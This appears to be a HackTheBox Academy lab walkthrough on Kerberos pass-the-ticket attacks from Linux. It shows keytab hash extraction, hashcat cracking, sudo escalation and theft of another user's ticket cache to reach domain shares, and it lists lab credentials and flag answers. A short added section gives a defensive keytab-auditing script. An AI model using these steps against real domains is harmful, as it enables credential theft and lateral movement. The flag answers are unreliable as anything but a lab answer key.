Pass the Ticket (PtT) from Linux
ℹ️ Information
- 🌐 Website: HackTheBox
- 📚 Module: Password Attacks
- 🔗 Link: Pass the Ticket (PtT) from Linux
❓Question
Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory.
📋 Walkthrough
Log in as user "david@inlanefreight.htb" with password "Password2".
Answer
Gett1ng_Acc3$$_to_LINUX01
❓Question
Which group can connect to LINUX01?
📋 Walkthrough
To find out which group can connect to LINUX01, use the realm list command:
$ realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
Answer
Linux Admins
❓Question
Look for a keytab file to which you have read and write access. Submit the file name as a response.
📋 Walkthrough
To find keytab files, use the find command:
Answer
carlos.keytab
❓Question
Extract the hashes from the keytab file you found, crack the password, log in as the user and submit the flag in the user's home directory.
📋 Walkthrough
Extract the keytab using keytabextract.py:
david@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
Now crack the password with hash a738f92b3c08b424ec2d99589a9cce60:
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ echo "a738f92b3c08b424ec2d99589a9cce60" > hash
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
a738f92b3c08b424ec2d99589a9cce60:Pa*******
Log in as carlos@inlanefreight.htb:
david@inlanefreight.htb@linux01:~$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ ls
flag.txt script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat flag.txt
C@rl0s******
Answer
C@rl0s******
❓Question
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
📋 Walkthrough
Check crontab:
# m h dom mon dow command
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
Check the script:
carlos@inlanefreight.htb@linux01:~$ cat .scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
Check the keytab:
carlos@inlanefreight.htb@linux01:~$ klist -k -t .scripts/svc_workstations.kt
Keytab name: FILE:.scripts/svc_workstations.kt
KVNO Timestamp Principal
---- ------------------- ------------------------------------------------------
1 03/15/2025 16:00:01 svc_workstations@INLANEFREIGHT.HTB
If the keytab is incorrect, check for another keytab:
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py .scripts/svc_workstations._all.kt
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
NTLM HASH : 7247e8d4387e76996ff3f18a34316fdd
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
AES-128 HASH : 3a7e52143531408f39101187acc80677
Crack the password:
Log in as svc_workstations:
carlos@inlanefreight.htb@linux01:~$ su svc_workstations@inlanefreight.htb
Password:
svc_workstations@inlanefreight.htb@linux01:/home/carlos@inlanefreight.htb$ cd ~
svc_workstations@inlanefreight.htb@linux01:~$ ls
flag.txt
svc_workstations@inlanefreight.htb@linux01:~$ cat flag.txt
Mor3_4cce$$_***********
Answer
Mor3_4cce$$_m0r3_Pr1v$
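An added audit example for the keytabs handled in the two walkthroughs above (carlos.keytab and the svc_workstations keytabs); it is not part of the original walkthrough or the lab's tooling. It parses the version 0x0502 keytab layout without returning key bytes and reports access beyond the owner and RC4-HMAC entries, the enctype for which keytabextract.py printed an NTLM hash. The sample bytes, the principal svc_example and the realm EXAMPLE.TEST are constructed.

```python
import os, stat, struct

def _counted(data, p):  # uint16-length-prefixed string at p -> (text, next offset)
    (n,) = struct.unpack_from(">H", data, p)
    return data[p + 2:p + 2 + n].decode(), p + 2 + n

def parse_keytab(data):
    """Return (principal, kvno, enctype) per entry of a v2 (0x0502) keytab; key bytes are skipped."""
    if data[:2] != b"\x05\x02":
        raise ValueError("not a version 0x0502 keytab")
    entries, pos = [], 2
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size <= 0:                       # negative size marks a deleted slot
            pos -= size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", data, pos)
        realm, p = _counted(data, pos + 2)
        parts = []
        for _ in range(ncomp):
            part, p = _counted(data, p)
            parts.append(part)
        p += 8                              # skip name type and timestamp
        kvno = data[p]
        etype, klen = struct.unpack_from(">HH", data, p + 1)
        p += 5 + klen                       # skip kvno8, enctype, key length, key
        if end - p >= 4:                    # optional 32-bit kvno replaces the 8-bit one
            kvno = struct.unpack_from(">I", data, p)[0] or kvno
        entries.append(("/".join(parts) + "@" + realm, kvno, etype))
        pos = end
    return entries

def audit_keytab(path):
    """Findings for one keytab: access beyond the owner, and RC4-HMAC (etype 23) keys."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        findings.append(f"mode {mode:04o} grants access beyond the owner")
    with open(path, "rb") as fh:
        for principal, kvno, etype in parse_keytab(fh.read()):
            if etype == 23:
                findings.append(f"{principal} kvno {kvno}: rc4-hmac key is the NT hash")
    return findings

# Constructed sample (not from the lab): one rc4-hmac entry with an all-zero dummy key.
SAMPLE = (b"\x05\x02" + struct.pack(">i", 58) + b"\x00\x01" + b"\x00\x0cEXAMPLE.TEST"
          + b"\x00\x0bsvc_example" + struct.pack(">IIBHH", 1, 0, 1, 23, 16) + bytes(16))
```

Run audit_keytab over every keytab path found on a host; any finding on a keytab outside /etc/krb5.keytab's root-only mode is worth reviewing.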
❓Question
Check the sudo privileges of the svc_workstations user and get access as root. Submit the flag in /root/flag.txt directory as the response.
📋 Walkthrough
Check sudo privileges:
svc_workstations@inlanefreight.htb@linux01:~$ sudo -l
[sudo] password for svc_workstations@inlanefreight.htb:
Matching Defaults entries for svc_workstations@inlanefreight.htb on
linux01:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User svc_workstations@inlanefreight.htb may run the following commands
on linux01:
(ALL) ALL
Run command as root:
Answer
Ro0t_********
❓Question
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
📋 Walkthrough
List Kerberos tickets in /tmp:
svc_workstations@inlanefreight.htb@linux01:/tmp$ ls | grep krb
krb5cc_647401106_HRJDux
krb5cc_647401106_Uib3BQ
krb5cc_647401107_tSR6gp
krb5cc_647401109_6rDqRC
krb5cc_647402606
krb5cc_647402606_Ak5Zno
Identify Julio's ticket:
svc_workstations@inlanefreight.htb@linux01:/tmp$ ls -la | grep krb5
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1414 Mar 15 16:30 krb5cc_647401106_HKY8fO
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Mar 15 16:30 krb5cc_647401106_HRJDux
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Mar 15 15:40 krb5cc_647401107_tSR6gp
-rw------- 1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Mar 15 16:18 krb5cc_647401109_6rDqRC
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1746 Mar 15 16:30 krb5cc_647402606
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1746 Mar 15 16:13 krb5cc_647402606_Ak5Zno
Copy and import Julio's ticket:
svc_workstations@inlanefreight.htb@linux01:/tmp$ sudo su
root@linux01:/tmp# cp /tmp/krb5cc_647401106_HKY8fO /root
root@linux01:/tmp# cd ~
root@linux01:~# ls
flag.txt krb5cc_647401106_HKY8fO snap
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_HKY8fO
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_HKY8fO
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
03/15/2025 16:31:03 03/16/2025 02:31:03 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 03/16/2025 16:31:03
Access the domain share folder:
root@linux01:~# smbclient //dc01/C$ -k -c ls -no-pass
$Recycle.Bin DHS 0 Wed Oct 6 17:31:14 2021
Config.Msi DHS 0 Wed Oct 6 14:26:27 2021
Documents and Settings DHSrn 0 Wed Oct 6 20:38:04 2021
john D 0 Mon Jul 18 13:19:50 2022
julio D 0 Mon Jul 18 13:54:02 2022
pagefile.sys AHS 738197504 Sat Mar 15 15:39:13 2025
PerfLogs D 0 Fri Feb 25 16:20:48 2022
Program Files DR 0 Wed Oct 6 20:50:50 2021
Program Files (x86) D 0 Mon Jul 18 16:00:35 2022
ProgramData DHn 0 Fri Aug 19 12:18:42 2022
SharedFolder D 0 Thu Oct 6 14:46:20 2022
System Volume Information DHS 0 Wed Jul 13 19:01:52 2022
tools D 0 Thu Sep 22 18:19:04 2022
Users DR 0 Thu Oct 6 11:46:05 2022
Windows D 0 Mon Oct 10 10:48:55 2022
7706623 blocks of size 4096. 4459828 blocks available
Access Julio's folder:
root@linux01:~# smbclient //dc01/julio -k
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 17 Thu Jul 14 21:18:12 2022
7706623 blocks of size 4096. 4459700 blocks available
smb: \> get julio.txt
getting file \julio.txt of size 17 as julio.txt (16.6 KiloBytes/sec) (average 16.6 KiloBytes/sec)
smb: \> exit
root@linux01:~# ls
flag.txt julio.txt krb5cc_647401106_HKY8fO snap
root@linux01:~# cat julio.txt
JuL1()_SH@*****
Answer
JuL1()_SH@*****
❓Question
Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
📋 Walkthrough
Check for the keytab in /etc/krb5.keytab:
root@linux01:~# klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 LINUX01$@INLANEFREIGHT.HTB
2 LINUX01$@INLANEFREIGHT.HTB
2 LINUX01$@INLANEFREIGHT.HTB
2 host/LINUX01@INLANEFREIGHT.HTB
2 host/LINUX01@INLANEFREIGHT.HTB
2 host/LINUX01@INLANEFREIGHT.HTB
2 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
2 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
2 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
2 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 LINUX01$@INLANEFREIGHT.HTB
3 LINUX01$@INLANEFREIGHT.HTB
3 LINUX01$@INLANEFREIGHT.HTB
3 host/LINUX01@INLANEFREIGHT.HTB
3 host/LINUX01@INLANEFREIGHT.HTB
3 host/LINUX01@INLANEFREIGHT.HTB
3 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
3 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
3 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
3 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
Initialize the Kerberos ticket:
root@linux01:~# kinit LINUX01$ -k -t /etc/krb5.keytab
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_HKY8fO
Default principal: LINUX01$@INLANEFREIGHT.HTB
Valid starting Expires Service principal
03/15/2025 17:05:32 03/16/2025 03:05:32 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 03/16/2025 17:05:32
Access the share folder:
root@linux01:~# smbclient //dc01/linux01 -k
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Oct 5 14:17:02 2022
.. D 0 Wed Oct 5 14:17:02 2022
flag.txt A 52 Wed Oct 5 14:17:02 2022
7706623 blocks of size 4096. 4459818 blocks available
smb: \> get flag.txt
getting file \flag.txt of size 52 as flag.txt (25.4 KiloBytes/sec) (average 25.4 KiloBytes/sec)
smb: \> exit
root@linux01:~# ls
flag.txt julio.txt krb5cc_647401106_HKY8fO snap
root@linux01:~# cat flag.txt
Us1nG_*************
Answer
Us1nG_*************